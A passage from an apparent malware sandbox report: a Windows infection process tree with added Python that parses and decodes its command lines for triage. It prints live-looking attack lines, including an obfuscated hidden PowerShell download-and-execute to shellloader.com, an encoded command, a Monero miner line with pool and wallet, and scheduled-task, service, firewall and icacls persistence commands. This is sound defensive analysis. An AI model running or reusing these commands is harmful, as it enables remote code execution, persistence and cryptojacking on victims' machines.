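BASE58 = set('123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz')

# Constructed sample input: command lines copied from the process tree above.
MINER_CMD = (
    r'C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 '
    r'--randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 '
    r'--url=xmr-eu2.nanopool.org:14433 '
    r'--user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password '
    r'--pass= --cpu-max-threads-hint=30 '
    r'--cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" '
    r'--cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth'
)
SCHTASKS_CMD = (
    'schtasks /create /f /sc onlogon /rl highest /tn "services64" '
    '/tr \'"C:\\Users\\Admin\\AppData\\Roaming\\services64.exe"\''
)


def tokens(cmd):
    return TOKEN.findall(cmd)


def unquote(t):
    t = t.strip("'")                          # cmd.exe wrapped the /tr value in '...'
    if len(t) >= 2 and t[0] == t[-1] == '"':
        t = t[1:-1]
    return t.replace('\\"', '"')


def looks_like_monero_address(s):
    """Format check only: a standard Monero address is 95 base58 characters starting
    with 4 (8 for a subaddress). It says nothing about whether the wallet is live."""
    return len(s) == 95 and s[0] in '48' and set(s) <= BASE58


def triage_miner(cmd):
    """Pull image, pool, wallet and stealth settings out of an XMRig-style command line."""
    toks = tokens(cmd)
    image, opts = unquote(toks[0]), {}
    for t in toks[1:]:
        if t.startswith('--'):
            key, _, val = t[2:].partition('=')
            opts[key.lower()] = unquote(val)  # bare flags such as --tls map to ''
    # Assumption: pool-side "wallet.worker" convention, so split at the first dot.
    wallet, _, suffix = opts.get('user', '').partition('.')
    return {
        'image': image,
        'image_is_windows_shell': image.lower().endswith('\\explorer.exe'),
        'pool': opts.get('url'),
        'tls': 'tls' in opts,
        'wallet': wallet,
        'wallet_plausible': looks_like_monero_address(wallet),
        'worker_suffix': suffix,
        'cpu_threads_hint': opts.get('cpu-max-threads-hint'),
        'stealth': 'cinit-stealth' in opts,
        'idle_only': 'cinit-idle-cpu' in opts,
    }


def parse_schtasks(cmd):
    """Parse a schtasks command line and decide whether it establishes persistence."""
    toks = tokens(cmd)
    out = {'action': None, 'schedule': None, 'run_level': None, 'task_name': None, 'task_run': None}
    i = 0
    while i < len(toks):
        t = toks[i].lower()
        nxt = toks[i + 1] if i + 1 < len(toks) else ''
        if t in ('/create', '/delete', '/change'):
            out['action'] = t[1:]
        elif t == '/sc':
            out['schedule'] = nxt.lower(); i += 1
        elif t == '/rl':
            out['run_level'] = nxt.lower(); i += 1
        elif t == '/tn':
            out['task_name'] = unquote(nxt); i += 1
        elif t == '/tr':
            out['task_run'] = unquote(nxt); i += 1
        i += 1
    run = (out['task_run'] or '').lower()
    # Logon/boot trigger pointing at a user-writable directory is the persistence pattern.
    out['persistence'] = (out['action'] == 'create'
                          and out['schedule'] in ('onlogon', 'onstart')
                          and any(d in run for d in ('\\appdata\\', '\\programdata\\', '\\temp\\')))
    return out


if __name__ == '__main__':
    for k, v in triage_miner(MINER_CMD).items():
        print(f'{k:24} {v}')
    print(parse_schtasks(SCHTASKS_CMD))
```

The `wallet_plausible` field is there so a reviewer can tell a real-looking wallet from placeholder text in a config; it does not validate the address checksum. The task parser deliberately treats any logon or boot trigger into AppData, ProgramData or Temp as persistence, since legitimate installers rarely schedule binaries from those locations with `/rl highest`.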
[depth 8] C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe
    "C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken

[depth 9] C:\ProgramData\8043795.exe
    "C:\ProgramData\8043795.exe"
    - Executes dropped EXE
    - Checks BIOS information in registry
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext

[depth 9] C:\ProgramData\5958877.exe
    "C:\ProgramData\5958877.exe"
    - Suspicious use of SetThreadContext

[depth 10] C:\ProgramData\5958877.exe
    "C:\ProgramData\5958877.exe"

[depth 10] C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 7132 -s 940
    - Program crash

[depth 9] C:\ProgramData\4203002.exe
    "C:\ProgramData\4203002.exe"
    - Checks BIOS information in registry
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger

[depth 8] C:\Users\Admin\AppData\Local\Temp\2.exe
    "C:\Users\Admin\AppData\Local\Temp\2.exe"
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken

[depth 9] C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
    "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

[depth 10] C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
    "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
    - Modifies data under HKEY_USERS

[depth 8] C:\Users\Admin\AppData\Local\Temp\setup.exe
    "C:\Users\Admin\AppData\Local\Temp\setup.exe"
    - Executes dropped EXE

[depth 9] C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4204 -s 804
    - Program crash

[depth 9] C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4204 -s 840
    - Program crash

[depth 9] C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4204 -s 884
    - Program crash

[depth 9] C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4204 -s 896
    - Program crash

[depth 9] C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4204 -s 924
    - Program crash

[depth 9] C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4204 -s 820
    - Program crash

[depth 8] C:\Users\Admin\AppData\Local\Temp\askinstall58.exe
    "C:\Users\Admin\AppData\Local\Temp\askinstall58.exe"
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
[depth 8] C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecMik18.exe
    "C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecMik18.exe"
    - Executes dropped EXE

[depth 9] C:\Users\Admin\AppData\Local\Temp\tmpB21F_tmp.exe
    "C:\Users\Admin\AppData\Local\Temp\tmpB21F_tmp.exe"
    - Suspicious use of SetThreadContext

[depth 10] C:\Users\Admin\AppData\Local\Temp\tmpB21F_tmp.exe
    C:\Users\Admin\AppData\Local\Temp\tmpB21F_tmp.exe

[depth 8] C:\Users\Admin\AppData\Local\Temp\setup_2.exe
    "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"

[depth 9] C:\Users\Admin\AppData\Local\Temp\is-QUJ87.tmp\setup_2.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-QUJ87.tmp\setup_2.tmp" /SL5="$50138,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"

[depth 10] C:\Users\Admin\AppData\Local\Temp\setup_2.exe
    "C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT

[depth 11] C:\Users\Admin\AppData\Local\Temp\is-8UH0K.tmp\setup_2.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-8UH0K.tmp\setup_2.tmp" /SL5="$2035E,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
    - Loads dropped DLL
    - Drops file in Program Files directory
    - Suspicious use of FindShellTrayWindow

[depth 12] C:\Users\Admin\AppData\Local\Temp\is-LD5KK.tmp\postback.exe
    "C:\Users\Admin\AppData\Local\Temp\is-LD5KK.tmp\postback.exe" ss1

[depth 13] C:\Windows\SysWOW64\explorer.exe
    explorer.exe ss1

[depth 14] C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.com/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"

[depth 15] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.com/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
    - Blocklisted process makes network request

[depth 14] C:\Windows\SysWOW64\cmd.exe
    cmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\QxXRsvvqO.dll"

[depth 15] C:\Windows\SysWOW64\regsvr32.exe
    regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\QxXRsvvqO.dll"
    - Loads dropped DLL

[depth 16] C:\Windows\system32\regsvr32.exe
    /s "C:\Users\Admin\AppData\Local\Temp\QxXRsvvqO.dll"
    - Loads dropped DLL

[depth 14] C:\Windows\SysWOW64\cmd.exe
    cmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\QxXRsvvqO.dllsfcmYduqe.dll"

[depth 15] C:\Windows\SysWOW64\regsvr32.exe
    regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\QxXRsvvqO.dllsfcmYduqe.dll"
    - Loads dropped DLL

[depth 16] C:\Windows\system32\regsvr32.exe
    /s "C:\Users\Admin\AppData\Local\Temp\QxXRsvvqO.dllsfcmYduqe.dll"
    - Loads dropped DLL

[depth 8] C:\Users\Admin\AppData\Local\Temp\3002.exe
    "C:\Users\Admin\AppData\Local\Temp\3002.exe"
    - Executes dropped EXE

[depth 9] C:\Users\Admin\AppData\Local\Temp\3002.exe
    "C:\Users\Admin\AppData\Local\Temp\3002.exe" -a

[depth 8] C:\Users\Admin\AppData\Local\Temp\6.exe
    "C:\Users\Admin\AppData\Local\Temp\6.exe"
    - Executes dropped EXE

[depth 8] C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
    "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
    - Executes dropped EXE

[depth 8] C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
    "C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"
    - Executes dropped EXE
[depth 5] C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Sat20ed203af5.exe

[depth 6] C:\Users\Admin\AppData\Local\Temp\7zSC7375180\Sat20ed203af5.exe
    Sat20ed203af5.exe
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken

[depth 7] C:\Users\Admin\AppData\Roaming\7541406.scr
    "C:\Users\Admin\AppData\Roaming\7541406.scr" /S
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken

[depth 7] C:\Users\Admin\AppData\Roaming\5875517.scr
    "C:\Users\Admin\AppData\Roaming\5875517.scr" /S
    - Executes dropped EXE
    - Checks BIOS information in registry
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger

[depth 7] C:\Users\Admin\AppData\Roaming\5125044.scr
    "C:\Users\Admin\AppData\Roaming\5125044.scr" /S
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of AdjustPrivilegeToken

[depth 8] C:\Users\Admin\AppData\Roaming\5125044.scr
    "C:\Users\Admin\AppData\Roaming\5125044.scr"
    - Executes dropped EXE

[depth 8] C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2468 -s 940
    - Program crash

[depth 7] C:\Users\Admin\AppData\Roaming\3040445.scr
    "C:\Users\Admin\AppData\Roaming\3040445.scr" /S
    - Executes dropped EXE
    - Checks BIOS information in registry
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger

[depth 5] C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Sat2077373f11706fb7.exe

[depth 6] C:\Users\Admin\AppData\Local\Temp\7zSC7375180\Sat2077373f11706fb7.exe
    Sat2077373f11706fb7.exe
    - Executes dropped EXE

[depth 5] C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Sat20de8d8504.exe

[depth 5] C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Sat200240b71b.exe

[depth 6] C:\Users\Admin\AppData\Local\Temp\7zSC7375180\Sat200240b71b.exe
    Sat200240b71b.exe
    - Executes dropped EXE
    - Modifies system certificate store

[depth 7] C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 932
    - Suspicious use of NtCreateProcessExOtherParentProcess
    - Program crash

[depth 5] C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Sat2026ef0d60b87a3f5.exe

[depth 6] C:\Users\Admin\AppData\Local\Temp\7zSC7375180\Sat2026ef0d60b87a3f5.exe
    Sat2026ef0d60b87a3f5.exe
    - Executes dropped EXE
    - Suspicious use of SetThreadContext

[depth 7] C:\Users\Admin\AppData\Local\Temp\7zSC7375180\Sat2026ef0d60b87a3f5.exe
    C:\Users\Admin\AppData\Local\Temp\7zSC7375180\Sat2026ef0d60b87a3f5.exe
    - Executes dropped EXE

[depth 7] C:\Users\Admin\AppData\Local\Temp\7zSC7375180\Sat2026ef0d60b87a3f5.exe
    C:\Users\Admin\AppData\Local\Temp\7zSC7375180\Sat2026ef0d60b87a3f5.exe
    - Executes dropped EXE

[depth 5] C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Sat20545a92617f.exe /mixone

[depth 5] C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Sat20627fa1c49.exe
[depth 2] C:\Users\Admin\AppData\Local\Temp\A48E.exe
    C:\Users\Admin\AppData\Local\Temp\A48E.exe

[depth 2] C:\Users\Admin\AppData\Local\Temp\DCC6.exe
    C:\Users\Admin\AppData\Local\Temp\DCC6.exe
    - Suspicious use of SetThreadContext

[depth 3] C:\Users\Admin\AppData\Local\Temp\DCC6.exe
    C:\Users\Admin\AppData\Local\Temp\DCC6.exe
    - Adds Run key to start application

[depth 4] C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Users\Admin\AppData\Local\7b094cea-f672-4562-9e16-411086b96df0" /deny *S-1-1-0:(OI)(CI)(DE,DC)
    - Modifies file permissions

[depth 4] C:\Users\Admin\AppData\Local\Temp\DCC6.exe
    "C:\Users\Admin\AppData\Local\Temp\DCC6.exe" --Admin IsNotAutoStart IsNotTask
    - Suspicious use of SetThreadContext

[depth 5] C:\Users\Admin\AppData\Local\Temp\DCC6.exe
    "C:\Users\Admin\AppData\Local\Temp\DCC6.exe" --Admin IsNotAutoStart IsNotTask
    - Modifies extensions of user files

[depth 6] C:\Users\Admin\AppData\Local\4c228ff9-322f-4a90-b999-cce4a298d53a\build2.exe
    "C:\Users\Admin\AppData\Local\4c228ff9-322f-4a90-b999-cce4a298d53a\build2.exe"
    - Suspicious use of SetThreadContext

[depth 7] C:\Users\Admin\AppData\Local\4c228ff9-322f-4a90-b999-cce4a298d53a\build2.exe
    "C:\Users\Admin\AppData\Local\4c228ff9-322f-4a90-b999-cce4a298d53a\build2.exe"
    - Loads dropped DLL
    - Checks processor information in registry

[depth 8] C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\4c228ff9-322f-4a90-b999-cce4a298d53a\build2.exe" & del C:\ProgramData\*.dll & exit

[depth 9] C:\Windows\SysWOW64\taskkill.exe
    taskkill /im build2.exe /f
    - Executes dropped EXE
    - Loads dropped DLL
    - Kills process with taskkill

[depth 9] C:\Windows\SysWOW64\timeout.exe
    timeout /t 6
    - Delays execution with timeout.exe
[depth 2] C:\Users\Admin\AppData\Local\Temp\FE0A.exe
    C:\Users\Admin\AppData\Local\Temp\FE0A.exe

[depth 2] C:\Users\Admin\AppData\Local\Temp\1E74.exe
    C:\Users\Admin\AppData\Local\Temp\1E74.exe

[depth 3] C:\Windows\SysWOW64\cmd.exe
    cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\1E74.exe"

[depth 4] C:\Windows\SysWOW64\timeout.exe
    timeout /T 10 /NOBREAK
    - Delays execution with timeout.exe

[depth 2] C:\Users\Admin\AppData\Local\Temp\6419.exe
    C:\Users\Admin\AppData\Local\Temp\6419.exe
    - Checks BIOS information in registry
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger

[depth 2] C:\Users\Admin\AppData\Local\Temp\BA78.exe
    C:\Users\Admin\AppData\Local\Temp\BA78.exe

[depth 2] C:\Users\Admin\AppData\Local\Temp\D8FD.exe
    C:\Users\Admin\AppData\Local\Temp\D8FD.exe
    - Loads dropped DLL

[depth 3] C:\Windows\SysWOW64\cmd.exe
    cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\D8FD.exe"

[depth 4] C:\Windows\SysWOW64\timeout.exe
    timeout /T 10 /NOBREAK
    - Delays execution with timeout.exe

[depth 2] C:\Users\Admin\AppData\Local\Temp\3CD9.exe
    C:\Users\Admin\AppData\Local\Temp\3CD9.exe

[depth 3] C:\Users\Admin\AppData\Local\Temp\3CD9.exe
    C:\Users\Admin\AppData\Local\Temp\3CD9.exe
    - Checks SCSI registry key(s)
    - Suspicious behavior: MapViewOfSection

[depth 2] C:\Users\Admin\AppData\Local\Temp\4769.exe
    C:\Users\Admin\AppData\Local\Temp\4769.exe
    - Suspicious use of SetThreadContext

[depth 3] C:\Users\Admin\AppData\Local\Temp\4769.exe
    C:\Users\Admin\AppData\Local\Temp\4769.exe

[depth 2] C:\Users\Admin\AppData\Local\Temp\BC4C.exe
    C:\Users\Admin\AppData\Local\Temp\BC4C.exe
    - Checks BIOS information in registry
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger

[depth 2] C:\Users\Admin\AppData\Local\Temp\72AC.exe
    C:\Users\Admin\AppData\Local\Temp\72AC.exe

[depth 3] C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\qinbwhni\

[depth 3] C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\ushtnjuk.exe" C:\Windows\SysWOW64\qinbwhni\

[depth 3] C:\Windows\SysWOW64\sc.exe
    "C:\Windows\System32\sc.exe" create qinbwhni binPath= "C:\Windows\SysWOW64\qinbwhni\ushtnjuk.exe /d\"C:\Users\Admin\AppData\Local\Temp\72AC.exe\"" type= own start= auto DisplayName= "wifi support"

[depth 3] C:\Windows\SysWOW64\sc.exe
    "C:\Windows\System32\sc.exe" description qinbwhni "wifi internet conection"

[depth 3] C:\Windows\SysWOW64\sc.exe
    "C:\Windows\System32\sc.exe" start qinbwhni
    - Suspicious use of SetThreadContext

[depth 3] C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
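The 72AC.exe subtree above is a complete service-based persistence sequence: mkdir a new folder under SysWOW64, move the dropped binary into it, sc create an auto-start service whose binPath hands the original dropper path back as a /d"..." argument, describe it as "wifi internet conection" and start it (the SetThreadContext signature lands on the start), then netsh adds an inbound allow rule for C:\Windows\SysWOW64\svchost.exe under a Windows-sounding rule name. Earlier, at depth 4 under DCC6.exe, icacls denied Everyone (S-1-1-0) delete rights on the ransomware's working directory so the user cannot simply remove it. The Python below is an added example, not part of the report: it parses those command lines (sc's "key= value" syntax with the escaped quotes inside binPath, netsh's key=value pairs, and the icacls ACE grammar) and turns them into tagged findings. The three sample lines are copied from the tree; the SID table and icacls right names cover only what these lines use, and the "non-standard subdirectory of SysWOW64" rule is a coarse heuristic that a production rule would pair with an allow-list.

```python
"""Service, firewall and ACL command lines from the tree above, parsed into findings.
Added example; the three sample lines are copied from the report as constructed input."""
import re

TOKEN = re.compile(r'(?:[^\s"]+|"(?:\\.|[^"\\])*")+')   # "..." segments may embed spaces and \" escapes

# Constructed sample input: command lines copied from the process tree above.
SC_CMD = (r'"C:\Windows\System32\sc.exe" create qinbwhni binPath= '
          r'"C:\Windows\SysWOW64\qinbwhni\ushtnjuk.exe /d\"C:\Users\Admin\AppData\Local\Temp\72AC.exe\"" '
          r'type= own start= auto DisplayName= "wifi support"')
NETSH_CMD = (r'"C:\Windows\System32\netsh.exe" advfirewall firewall add rule '
             r'name="Host-process for services of Windows" dir=in action=allow '
             r'program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul')
ICACLS_CMD = (r'icacls "C:\Users\Admin\AppData\Local\7b094cea-f672-4562-9e16-411086b96df0" '
              r'/deny *S-1-1-0:(OI)(CI)(DE,DC)')

WELL_KNOWN_SIDS = {'S-1-1-0': 'Everyone'}                       # only the SID this sample uses
ICACLS_RIGHTS = {'DE': 'delete', 'DC': 'delete child', 'F': 'full control',
                 'M': 'modify', 'RX': 'read and execute', 'R': 'read', 'W': 'write'}
INHERIT_FLAGS = {'OI', 'CI', 'IO', 'NP'}


def tokens(cmd):
    return TOKEN.findall(cmd)


def unquote(t):
    if len(t) >= 2 and t[0] == t[-1] == '"':
        t = t[1:-1]
    return t.replace('\\"', '"')


def parse_sc_create(cmd):
    """sc create <name> key= value ...  (note the space after '=')."""
    toks = tokens(cmd)
    if len(toks) < 3 or toks[1].lower() != 'create':
        return None
    svc, i = {'name': toks[2]}, 3
    while i + 1 < len(toks):
        if toks[i].endswith('='):
            svc[toks[i][:-1].lower()] = unquote(toks[i + 1])
            i += 2
        else:
            i += 1
    bin_toks = tokens(svc.get('binpath', ''))       # binPath is itself a command line
    svc['binary'] = unquote(bin_toks[0]) if bin_toks else ''
    svc['binary_args'] = bin_toks[1:]
    return svc


def parse_netsh_rule(cmd):
    """netsh advfirewall firewall add rule key=value ..."""
    toks = tokens(cmd)
    low = [t.lower() for t in toks]
    if 'advfirewall' not in low or 'add' not in low:
        return None
    rule = {}
    for t in toks:
        if '=' in t and not t.startswith('"'):
            k, _, v = t.partition('=')
            rule[k.lower()] = unquote(v).split('>')[0]    # drop a glued '>nul' redirection
    return rule


def parse_icacls(cmd):
    """icacls <path> /deny|/grant [*]<sid|name>:(inherit)...(rights)"""
    toks = tokens(cmd)
    out = {'path': unquote(toks[1]) if len(toks) > 1 else None, 'aces': []}
    for i, t in enumerate(toks):
        if t.lower() in ('/deny', '/grant', '/grant:r') and i + 1 < len(toks):
            m = re.fullmatch(r'\*?(S-1-[\d-]+|[^:]+):((?:\([A-Z,]+\))+)', toks[i + 1])
            if not m:
                continue
            sid, spec = m.groups()
            parts = re.findall(r'\(([A-Z,]+)\)', spec)
            inherit = [p for p in parts if p in INHERIT_FLAGS]
            rights = [r for p in parts if p not in INHERIT_FLAGS for r in p.split(',')]
            out['aces'].append({'mode': t.lower().lstrip('/'),
                                'principal': WELL_KNOWN_SIDS.get(sid, sid),
                                'inherit': inherit,
                                'rights': [ICACLS_RIGHTS.get(r, r) for r in rights]})
    return out


def assess(svc, rule, acl):
    """Turn the parsed pieces into (tag, detail) findings."""
    out = []
    if svc:
        b = svc['binary'].lower()
        if re.search(r'\\(?:syswow64|system32)\\[^\\]+\\', b):   # heuristic: new subdir under a system dir
            out.append(('service_nonstandard_dir', svc['binary']))
        if any('\\temp\\' in a.lower() or '\\appdata\\' in a.lower() for a in svc['binary_args']):
            out.append(('service_arg_points_at_dropper', ' '.join(svc['binary_args'])))
        if svc.get('start') == 'auto':
            out.append(('service_autostart', svc['name']))
    if rule and rule.get('action') == 'allow' and rule.get('dir') == 'in' \
            and rule.get('program', '').lower().endswith('\\svchost.exe'):
        out.append(('firewall_inbound_allow_svchost', rule['program']))
    for ace in (acl or {}).get('aces', []):
        if ace['mode'] == 'deny' and ace['principal'] == 'Everyone' and 'delete' in ace['rights']:
            out.append(('acl_deny_delete_everyone', acl['path']))
    return out


if __name__ == '__main__':
    for tag, detail in assess(parse_sc_create(SC_CMD), parse_netsh_rule(NETSH_CMD), parse_icacls(ICACLS_CMD)):
        print(f'{tag:32} {detail}')
```

The binPath is parsed twice on purpose: once as an sc argument (which strips the outer quotes and the `\"` escapes) and once as the command line the service will actually run, which is where the reference back to the dropper in Temp shows up.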
[depth 2] C:\Users\Admin\AppData\Local\Temp\7916.exe
    C:\Users\Admin\AppData\Local\Temp\7916.exe
    - Adds Run key to start application

[depth 2] C:\Users\Admin\AppData\Local\Temp\D9E4.exe
    C:\Users\Admin\AppData\Local\Temp\D9E4.exe
    - Checks BIOS information in registry
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger

[depth 2] C:\Users\Admin\AppData\Local\Temp\EACD.exe
    C:\Users\Admin\AppData\Local\Temp\EACD.exe
    - Checks BIOS information in registry
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger

[depth 3] C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

[depth 2] C:\Users\Admin\AppData\Local\Temp\2EA.exe
    C:\Users\Admin\AppData\Local\Temp\2EA.exe

[depth 2] C:\Users\Admin\AppData\Local\Temp\905.exe
    C:\Users\Admin\AppData\Local\Temp\905.exe
    - Loads dropped DLL

[depth 2] C:\Users\Admin\AppData\Local\Temp\A8C5.exe
    C:\Users\Admin\AppData\Local\Temp\A8C5.exe
    - Checks BIOS information in registry
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger

[depth 1] c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Browser
    - Suspicious use of SetThreadContext

[depth 2] C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k SystemNetworkService
    - Drops file in System32 directory
    - Checks processor information in registry
    - Modifies data under HKEY_USERS

[depth 1] c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s WpnService

[depth 1] c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT

[depth 1] c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection

[depth 1] c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s SENS

[depth 1] c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Themes

[depth 1] c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s UserManager

[depth 1] c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc

[depth 1] c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
    - Drops file in System32 directory
    - Drops file in Windows directory

[depth 2] C:\Users\Admin\AppData\Roaming\ustucsu
    C:\Users\Admin\AppData\Roaming\ustucsu
[depth 2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

[depth 3] C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
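Two PowerShell command lines in this tree hide their payload from plain string matching. The one at depth 15 under postback.exe builds `$t` from a literal stuffed with `#`, strips the filler with `.replace`, splits on `@` and then calls the first piece (`iex`) on the second; the one at depth 2 above passes the script as `-EncodedCommand`, which is base64 over the UTF-16LE script text. The Python below is an added example, not from the report, that decodes both; its two inputs are copied from those entries. Decoded, the first is a `(new-object Net.WebClient).UploadString(...)` call, i.e. an HTTP POST of the string `SevenJoker` to http://shellloader.com/welcome (the URL listed under Malware Config) whose response is piped into Invoke-Expression; the second is `start-process -WindowStyle Hidden gpupdate.exe /force`, which matches the gpupdate child at depth 3. The decoder reads the filler and separator characters from the script itself rather than assuming `#` and `@`.

```python
"""Decoding the two PowerShell command-line obfuscations seen in this tree.
Added example; the two sample command lines are copied from the report as constructed input."""
import base64
import re

# (1) depth 15 under postback.exe: filler-stuffed literal, cleaned with .replace(), cut with .split(),
#     then "&$t[0] $t[1]" runs the first piece (iex) on the second.
HASHED_CMD = r'''powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.com/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"'''
# (2) depth 2: -EncodedCommand carries base64 of the UTF-16LE script text.
ENCODED_CMD = (r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand '
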